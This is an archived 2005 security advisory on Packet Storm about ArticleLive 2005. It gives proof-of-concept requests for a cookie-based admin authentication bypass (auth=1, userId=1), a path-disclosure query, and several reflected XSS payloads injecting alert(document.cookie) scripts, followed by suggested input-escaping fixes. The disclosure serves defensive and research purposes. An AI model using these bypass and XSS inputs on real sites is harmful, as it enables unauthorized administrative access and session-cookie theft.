exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

articleLive2005.txt

articleLive2005.txt
Posted Jul 15, 2005
Authored by Diabolic Crab | Site hackerscenter.com

ArticleLive 2005 suffers from authentication bypass, SQL injection, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | f9b50e96c9caf7ee8022a754614175015c6871e528929b17c70ff1aa539e24de
Download | Favorite | View

articleLive2005.txt

Change Mirror Download


Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! http://www.digitalparadox.org/services.ah

Looking for Publishers intrested in my Php Secure Coding Book.


Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005

Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: There are, authentication bypass, sql injections and xss in articlelive 2005.


Proof of Concept Exploits: 

http://www.example.com/admin/?
Full administrative authentication bypass

In the control panel, by setting your cookie to auth=1 and userId=1 would give you full administrative access.


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information DisclosureCategories=0
Full Path Disclosure

Warning: Wrong datatype for second argument in call to in_array in 
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460

Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default 
(Stretched)/Panels/SearchResultsPanel.php on line 163


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
XSS


http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
XSS


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input 
validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel 
free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close